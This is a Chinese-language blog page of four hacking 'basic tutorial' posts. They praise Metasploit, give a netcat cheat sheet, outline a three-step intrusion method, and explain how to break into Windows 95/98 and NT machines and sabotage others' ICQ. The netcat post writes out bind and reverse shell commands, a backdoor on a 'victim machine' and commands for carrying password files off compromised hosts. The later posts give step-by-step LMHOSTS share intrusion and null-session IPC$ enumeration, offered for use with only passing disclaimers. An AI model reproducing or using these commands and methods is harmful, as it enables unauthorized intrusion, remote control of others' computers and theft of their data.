目前分類:基礎教學 (4)

瀏覽方式: 標題列表 簡短摘要
這款軟體真的是超級超級超級_(無限延伸)    讚的!!!!

他提供一個利用 Exploit 的平台

之前是在 DOS 視窗 執行

需要打一堆指令才能繼續操作

現在提供可以在瀏覽器上面控制

不但減少需要打字的缺點

因為是可視化所以還讓人覺得操作方式簡單了許多

這版本讓我的感覺就是讚~

目前正在用流光找有 Holes 的電腦

測試一下好不好用

順帶一提

他的官網還有提供一堆的 Exploits 喔~

等我研究出詳細操作方法~

再發教程出來吧

至於載點 下面官網有 目前有 2.7 和 3.0版 (我目前用3.0

你一進去看右上角就有了~

祝各位研究愉快^^

www.metasploit.com/

teamaple 發表在 痞客邦 留言(0) 人氣()

nc.exe全稱NetCat,被譽為網絡安全界的"瑞士軍刀".nc.exe是一個非常標準的telnet客戶端工具,正因為它的強大功能使得它在入侵時被廣泛應用,成為黑客們的必備武器之一.

我把最近收集的nc.exe的使用方法整理了一下,發給大家.

另外還找到了一款改編後的可視化的nc,也提供給大家.

========================================================

軟件介紹: 

工具名:Netcat 
作者:Hobbit && Chris Wysopal 
類別:開放源碼 
平台:Linux/BSD/Unix/Windows 
WINDOWS下版本號:[v1.10 NT] 

========================================================

參數介紹: 

*nc.exe -h*即可看到各參數的使用方法。 
基本格式:nc [-options] hostname port[s] [ports] ... 
nc -l -p port [options] [hostname] [port] 

-d 後台模式 
-e prog 程序重定向,一旦連接,就執行 [危險!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h 幫助信息 
-i secs 延時的間隔 
-l 監聽模式,用於入站連接 
-L 連接關閉後,仍然繼續監聽 
-n 指定數字的IP地址,不能用hostname 
-o file 記錄16進制的傳輸 
-p port 本地端口號 
-r 隨機本地及遠程端口 
-s addr 本地源地址 
-t 使用TELNET交互方式 
-u UDP模式 
-v 詳細輸出--用兩個-v可得到更詳細的內容 
-w secs timeout的時間 
-z 將輸入輸出關掉--用於掃瞄時 

端口的表示方法可寫為M-N的範圍格式。 

========================================================

基本用法: 

1)連接到REMOTE主機,例子: 
格式:nc -nvv 192.168.x.x 80 
講解:連到192.168.x.x的TCP80端口 


2)監聽LOCAL主機,例子: 
格式:nc -l -p 80 
講解:監聽本機的TCP80端口 


3)掃瞄遠程主機,例子: 
格式:nc -nvv -w2 -z 192.168.x.x 80-445 
講解:掃瞄192.168.x.x的TCP80到TCP445的所有端口 


4)REMOTE主機綁定SHELL,例子: 
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe 
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口 


5)REMOTE主機綁定SHELL並反向連接,例子: 
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354 
講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口 


以上為最基本的幾種用法(其實NC的用法還有很多, 
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。

========================================================

高級用法:

6)作攻擊程序用,例子: 
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt 
講解:連接到192.168.x.x的80端口,並在其管道中發送*c:\exploit.txt*的內容(兩種格式確有相同的效果,真是有異曲同工之妙. 

附:*c:\exploit.txt*為shellcode等 


7)作蜜罐用[1],例子: 
格式:nc -L -p 80 
講解:使用*-L*(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c為止 


8)作蜜罐用[2],例子: 
格式:nc -L -p 80 > c:\log.txt 
講解:使用*-L*可以不停地監聽某一個端口,直到ctrl+c為止,同時把結果輸出到*c:\log.txt*中,如果把*>* 改為*>>*即可以追加日誌 

附:*c:\log.txt*為日誌等 


9)作蜜罐用[3],例子: 
格式1:nc -L -p 80 < c:\honeypot.txt 
格式2:type.exe c:\honeypot.txt|nc -L -p 80 
講解:使用*-L*可以不停地監聽某一個端口,直到ctrl+c為止,並把*c:\honeypot.txt*的內容*送*入其管道中 

10) 後門

victim machine: //受害者的機器

nc -l -p port -e cmd //win2000

nc -l -p port -e /bin/sh //unix,linux

attacker machine: //攻擊者的機器.

nc ip -p port //連接victim_IP,然後得到一個shell。


11)反向連接

attacker machine: //一般是sql2,遠程溢出,webdavx3攻擊.

//或者wollf的反向連接.

nc -vv -l -p port

victim machine:

nc -e cmd attacker ip -p port

nc -e /bin/sh attacker ip -p port


或者:

attacker machine:

nc -vv -l -p port1 /*用於輸入*/

nc -vv -l -p prot2 /*用於顯示*/

victim machine:

nc attacker_ip port1   cmd   nc attacker_ip port2

nc attacker_ip port1   /bin/sh   nc attacker_ip port2


139要加參數-s(nc -L -p 139 -d -e cmd -s 對方機器IP)

這樣就可以保證nc優先於NETBIOS。

12)傳送文件:

從肉雞拖密碼文件回來.

nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell執行

nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出

//肉雞需要gui界面的cmd裡面執行(終端登陸,不如安裝FTP方便).否則沒有辦法輸入Crl+C.


上傳命令文件到肉雞

nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出

nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell執行

//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.


結論: 可以傳輸ascii,bin文件.可以傳輸程序文件.


問題:連接某個ip後,傳送完成後,需要發送Ctrl+C退出nc .

或者只有再次連接使用pskill 殺掉進程.但是是否釋放傳輸文件打開的句柄了?


13) 端口數據抓包.

nc -vv -w 2 -o test.txt www.m4ker.net 80 21-15


< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error

< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr

< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...

< 00000084 83 00 00 01 8f # .....


14) telnet,自動批處理。

nc victim_ip port < path\file.cmd   /*victim machine*/ 顯示執行過程.

nc -vv victim_ip port < path\file.cmd   /*victim machine*/ 顯示執行過程.


nc -d victim_ip port < path\file.cmd 安靜模式.


_______________file.cmd________________________

password

cd %windir%

echo []=[%windir%]

c:

cd \

md test

cd /d %windir%\system32\

net stop sksockserver

snake -config port 11111

net start sksockserver

exit

下載連結  nc.exe

teamaple 發表在 痞客邦 留言(0) 人氣()

駭客入侵三部曲

 

前言:

這篇文章的目的不是教你怎麼去入侵。而是讓你了解黑客入侵的一些步驟。

 

第一步:確定目標

入侵的前提條件是確定攻擊目標,而這種確定往往都是有某種目的的。如:“商業目的、報復目的、練習等”。當然最終的結果都是獲得目標主機的最高權限,然後拍拍屁股離開。

確定目標的工具和方法都太多,如搜索引擎就會被用來確定目標,相信在台獨事件期間,有無數的人使用搜索引擎搜索諸如:“台灣政府”之類的網站。在獲得一個IP後,例:利用HostScan就可以派上用場了。掃描一個網段有那些主機後,一般會進入第二步。


 

第二步:訊息收集

在確定了入侵目標後,需要收集大量關於目標的訊息,這一點是相當關鍵的!如果這點做的很好,幾乎沒有不能入侵的主機。因為Internet是一個開放的平台。確定目標訊息是個廣義的說法,並不是只確定主機是什麼操作系統,用什麼web server 等等,當然這些都是必須的!不過要想百戰百勝,還需要了解更多的東西,如:“目標用戶其它的郵件地址、目標用戶喜歡上什麼網站、目標用戶經常泡那種類型的MM等等”。當然黑客還有個良好的習慣就是收集用戶訊息,一般會有一個自己的用戶訊息庫,裏邊記錄了很多有用的東西。

現在講講目標主機的訊息收集,說到訊息收集當然又離不開掃描了。通過掃描黑客會對目標主機有個大概的了解:主機開放了那些端口,目標運行了幾台主機、分別是什麼操作系統、運行的是什麼郵件系統、使用的是什麼WEB服務器、是否安裝防火牆、CGI漏洞是否存在。這些收集完成後,會在黑客的腦子裏形成一個大致的影像,然後針對弱點進行攻擊。

收集這些訊息有很多辦法和很多工具,別人的我就不說了,光說說自己的和一些指令吧!
在unix下先使用nslookup www.xxx.com查看目標運行了幾台主機並獲得IP地址。然後可以使用CGIHacker對目標IP進行掃描,如果發現CGI漏洞當然最好,如果沒有也別泄氣,日子還長著呢!使用其它網上提供的工具確定上邊說到的那些訊息,然後有針對性的進行嘗試。

如果是一台“肉雞”的話,一般掃描後你都會發現很多可以利用的東西,如果是有“firewall”的家伙就比較不容易對付了。當然這些也就都需要在第三步中講到。

 

第三步:攻擊

黑客的攻擊絕對不會是盲目的,在進行攻擊前肯定已經做過了第一和第二步,而且這時候說來也應該是胸有成竹了。在網上有很多的漏洞利用提供給黑客們,如果發現目標主機有遠程溢出,遠程命令執行之類的漏洞的話,那當然沒什麼說的了,如果只存在讓黑客獲得較小的權限的問題的話,黑客們會循序漸進,直到最後的成功。當然這其中有很多的技巧,如:欺騙、非法提升權限等等。所以說系統管理員千萬要重視網絡安全問題,哪怕是個小問題,也有可能造成整個系統的失陷。

再說說有firewall的主機吧!安裝了firewall的主機,往往有一定的安全意識,但也很有可能太迷信防火牆造成對防火牆的配置不當。IP欺騙我覺得算是一個比較典型的例子,firewall可以過濾IP這一點相信是眾人所知的,一般是過濾非信任用戶的IP不能使用某些服務或進入內部網絡。這也就出現了IP欺騙:“假裝自己的IP是你內部網絡中的一個地址,請求並進入內部。”但這一點我個人認為使用firewall是完全可以制止的,邏輯上來說,內部IP絕對是不可能從外邊進來的,所以應該禁止內部IP從外部進行訪問。

再強大的firewall都不會過濾80端口的訪問,除非目標主機根本就不提供服務。當然有些firewall會對80端口的一些get、post請求做一定的判斷,判斷用戶是否在進行非法請求,但黑客有還是有辦法對付的,如使用我朋友提供的那DONGDONG就可以讓firewall沒辦法。80端口的攻擊可以說是最為有效的了,但這需要黑客很有耐心、對CGI編程、數據庫有相當的了解。

說到對firewall的攻擊,又會回到第二步上,你需要做更多的訊息的收集,不但包括系統的還有個人的。用我的話來說就是:“我黑不了你這台主機,我黑系統管理員的郵件從而進一步對他進行了解,我破不了他的信箱密碼,我黑提供郵件服務的網站”。當然這其中也有會包含一些其它的欺騙技朮,說不定會花費相當長的一段時間,一個黑客甚至可能在偷看了你的信的情況下,對你做出一些分析,投你所好,和你成為很好的“朋友”,然後在取得你完全信任之後,悄悄“成為你的girlfriend(一種可穿過firewall 的木馬程序)”。別以為我說的這些是危言聳聽,這類事情絕對是真實存在的。俄羅斯黑客入侵五角大廈用了一年多的時間,結果他們成功了。你說這一年多內他們在做什麼呢?以我的理解他們一定在“收集訊息”說不定他們使用了某個將軍的個人電腦的密碼進入了五角大廈。

(本資料為網路收集-原為大陸網友所作,為符合本地閱讀習慣及本站體例,略作版面及字面更動)

teamaple 發表在 痞客邦 留言(0) 人氣()

何謂IP位址?
所謂IP就像是我們家的地址,網際網路就像是一個地球村,當你撥號或連上網路時就像你要加入到這地球村的一份子,既然要加入的話,當然就需要一個地址囉!也像是嬰兒出生了,就需要有一個名字一樣,只是在網際網路上的這名字不是中文的,而是由4組數字來分別,這4組當中以"."來分別,如
255.255.255.255 這四組中從0~255,不得大於255,所以列子中的這一組是最大的了。

如何知道本身及對方的IP位址?
知道對方的IP是駭客的第一要素,不知道IP就什麼都做不了了。
在WINDOWS中尋找出Winipcfg.exe按兩下,或從"開始/執行"視窗打入Winipcfg.exe按執行,但是你要連上網路才行,只不過這只有知道本身的IP位址。
在開啟"開始/程式集/MS-DOS模式"視窗,輸入NETSTAT -N後按ENTER,可以得到本身及跟網路上跟你有接觸的IP,左邊是你本身的IP,右邊為對方的。


要如何知道對方是使用哪一家的ISP上網的呢?
哈阿哈~~那就簡單了,在"開始/程式集/MS-DOS模式"視窗打入NETSTAT按執行這樣就知道對方是使用那一家ISP上網了,不過呢?有一些很不負責的ISP沒有設定也就沒有辦法知道了,但是也是可以使用瀏覽器偵測出來。以後再公佈吧!

當知道了對方的IP之後,要如何知道對方是在那一國家省份或縣市上網的呢?
比如對方的IP是163.30.100.16 然後在"開始/程式集/MS-DOS模式"視窗打入
"TRACERT 163.30.100.16" 後按執行得到如下的訊息:
--------------------------------------------------------------------------------------
1 115 ms 105 ms 110 ms h199.s42.ts.hinet.net [168.95.42.199]
2 99 ms 103 ms 103 ms h158.s42.ts.hinet.net [168.95.42.158]
3 106 ms 100 ms 100 ms h241.s42.ts.hinet.net [168.95.42.241]
4 104 ms 108 ms 101 ms TaiNan-R01.BR.HiNet.NET [168.95.202.133]
5 109 ms 107 ms 105 ms TaiPei-R02.BR.HiNet.NET [168.95.202.253]
6 115 ms 107 ms 112 ms h10.s78.ts.hinet.net [168.95.78.10]
7 106 ms 109 ms 107 ms h48.s78.ts.hinet.net [168.95.78.48]
8 268 ms 287 ms 249 ms h16.s100.ts30.hinet.net [163.30.100.16]
--------------------------------------------------------------------------------------
從第4行可以知道我是在台南用HINET上網的,從第5行可以看出對方是在台北上網的,該是台北縣,也是用HINE上網的。其實呢!還可以看出更多的東西,慢慢的體會吧!最少可以知道你跟對方的連線是否有順暢。


使用95或98侵入對方的電腦的條件,是否需要工具呢?

只要知道對方的ip,及電腦名稱即可,也都不需要工具,在此強調,不要滿腦筋老是想到要使用工具,其實我只是一個寫程式的,就像程式完成了交給客戶使用,而客戶只會使用,他們了解什麼呢?至於為什麼寫程式會涉及網路的侵入呢?那是因為我有些程式需要兩岸三地,或在國際間傳送資料,加上客戶有時連專線費用都要省,所以不得不出此下策。


那要如何知道對方的電腦名稱呢?
當知道對方的ip之後,如對方的IP是163.30.100.16,在"MS-DOS"視窗中輸入"nbtstat -A
163.30.100.16",會得到一些信息(因涉及對方隱私,故不列表說明),第一行就是對方的電腦名稱,第二行是工作群組或網域,第三行是電腦說明,如果還有第四、五行的話,就表示對方的電腦是在區網中,也就是說他的電腦還準備連接內部的網路。最後一行是他進入系統的使用者名稱。

請注意指令的參數是要大寫的,另外要是對方使用的電腦是98而且沒有資源分享,或許你就偵測不出來了,除非使用特殊的手法,有些網友常會在電腦名稱輸入自己的真實姓名,如果這樣的話,那麼我們就會知道他的真實姓名了。


如何把對方的ICQ玩弄於手掌間,包括對方隱形也知道他上線了,也可以炸他,也可以讓他發出聲音,也可以關掉他,甚至可以讓ICQ完全的刪掉???
(1).其實不管是什麼樣的網路軟體,只要知道程式開啟的PORT就可以控制他,像是網頁的話大部份都是PORT=80,一上網呢
,就會開139,舊版的95都不會關了這一PORT,所以就常被當機,但98也是有,以後再述,最多人用的NetMeeting聊天一開就是1503,登入及聊天就會開1720跟1730。

(2)ICQ呢?在以前時都是開在1027,可是因為常受到攻擊,所以現在的PORT都開在好幾千以上了,所以有些的炸ICQ程式都不
能用了,可是只要知道PORT之後,還是照炸不誤,
(3)會寫程式的人可以自己寫,只要從PORT送進一些信息就可以達到目地,如送進CHR(7)這類的封包...等等,甚至可以毀了ICQ,不會寫的呢?是不是就完了呢?不會的,站長了解您們,所以您們可以到"駭客寶箱"下載,那軟體的功能很多,也很強,幾乎連要毀掉對方的ICQ也可達到,還可以炸他,跟他開玩笑,輸入對方的ICQ號碼後,他會去找對方的PORT跟IP,只是有時PORT不是很準確,要是這樣的話,你就把偵測出來的PORT加上256就行了。

(4)不要問我那軟體怎麼用,真是很報歉,因為一問的話,那我回答的就會很多,到時我就忙死了,這樣就不能繼續公佈一些指令了,請見諒。
(5)在前面的基礎忘了公佈什麼是PORT,真是很報歉,以後再插播吧!對了,前面公佈的NETSTAT -N就可以看到PORT了。

如何防範ICQ受到破壞?需要工具嗎?
(1)聽說有一套軟體可以救回被炸的ICQ,可是呢?其實都不用軟體的,只要將ICQ目錄中的DB備份起來,被炸時關了ICQ,之後再將備份好的DB覆蓋過去就行了,如果嫌這樣太麻煩了,那麼會寫程式的就用寫的吧!只是一行的程式罷了,要不然您們還是去找那套軟體吧~聽說很好找的,我沒有用過,所以本站也不提供。

(2)以上是說被炸,那要如何不被炸呢,ICQ中有一個防火牆的項目,進去後設定你的PORT要開在哪裡,保証讓對方查PORT查的昏倒,當然是要設高一點的PORT了,可是呢?要是你ICQ名單上的人要炸你也是很容易的,他只要從ICQ發一封信息給你,馬上到DOS下執行NETSTAT
-N,這樣你的PORT就馬上被看到了,換言之..除了對方是高人外,炸你ICQ的人一定是你的朋友。

如何使用95或98侵入對方的電腦?需要工具嗎?
相信看過前面的公佈後,網友們該會知道對方的IP及電腦名稱了吧!ok
那這樣就行了,以下我只說如何做,要是網友想要知道原理,請在留言版,或是"駭客走廊"通知我,我會另外弄另一網頁來公佈他的原理,因為實在是太長了。步驟如下..請參考

1.在Windows下有一個檔名為"LMHOSTS.SAM"的檔案,把副檔名給刪了,變成了"LMHOSTS",如果沒有這檔案的網友,就用記事本新增一個就行了。
2.用記事本開啟LMHOSTS,再把裡面的內容都刪了,在第一行輸入對方的IP及電腦名稱,如 163.32.33.34
APP,163.32.33.34就是對方的IP,空一格後面的APP是對方的電腦名稱,接著存檔。
3.到"MS-DOS模式"下輸入NBTSTAT -R 按ENTER
4.到"開始/尋找/電腦"輸入對方的電腦名稱,按立即尋找,在下面的視窗中就會出現了對方的電腦了,按他的電腦兩下,就是進去了對方的電腦了,連對方有防火牆也檔不住。

5.入侵的前題:是你在進入95.98時需要輸入USERNAME跟密碼,對方的電腦也要有資源分享,若需要密碼(一般的使用者都不會設),或是對方沒有資源分享的話,也都不需要破解密碼的程式,但需要用NT或UNIX入侵,以後也會慢慢的公佈。


如何侵入NT主機及無資源分享的主機?需要工具嗎?

WU.你問了那麼多,無非就是侵入NT主機,一侵入你問我的7點問題就全都解決了,哈哈...
本來是要在下一次的"駭客指令"中公佈的,你這樣窮追猛打的問我,加上本站也即將關閉了,所以就在最後送你及各位網友一份禮吧!以下的指令很簡單,但需要在NT下DOS中執行
--------------------------------------------------------------------------------------
(1) net use \\對方的ip \ipc$ ""/user:""
**此行指令為建立"無意義ipc通訊"
(2) usrstat 對方網域 如對方的網域是domain就是打usrstat domain,(以下均以domain表示網域。
**此行為了解對方電腦有哪些使用者.名稱.及登入時間
(3)global "domain user" domain
**得知群組中的使用者
(4)netdomain query
**得知網域的處理原則
(5)net use 要連接檔案的路徑
**將對方的硬碟變成我們硬碟的一部份
(6)...
--------------------------------------------------------------------------------------
從(2)之後要是你執行了沒有那指令的話,那麼到NT的正版光碟尋找,在此我漏了如何得知密碼,從你給我的MAIL中知道你對電腦也十分有研究,我相信當建立了IPC通訊後,你該是動動腦的時後了,要是我連這也公佈了,那麼就違反我要關站的原則了。
重要的一點是,當你知道對方的最高使用者,及密碼後,再重開機,你想你可以辦任何事了。另外..你還要研究"信任網域"的基礎,那會收獲更多的。
以上..千萬不要做壞事,需要知道現在有很多ISP公司都使用NT,千萬不要偷別人的帳號來用,OK
一把不利的菜刀給你了,磨刀石在你的身上,看你怎麼磨利菜刀了,也怎麼用這把菜刀。如果執行不成功的話,那麼就改一下Lmhosts,有些指令要拿到最高使用者及密碼需要這檔的對映,所以當你拿到使用者及密碼後要重開機的原因在此。


什麼是PORT呢?
如果把IP解釋成我們家的地址的話,那麼PORT就是門了。當然我們家有時不只一扇門,使用的軟體不一樣,所要開啟的門也就不一樣,一般來說當我們開啟一套網路軟體後,便會開啟一個或數個PORT,有些軟體所開的PORT是固定的,但大部份都沒有固定。

teamaple 發表在 痞客邦 留言(49) 人氣()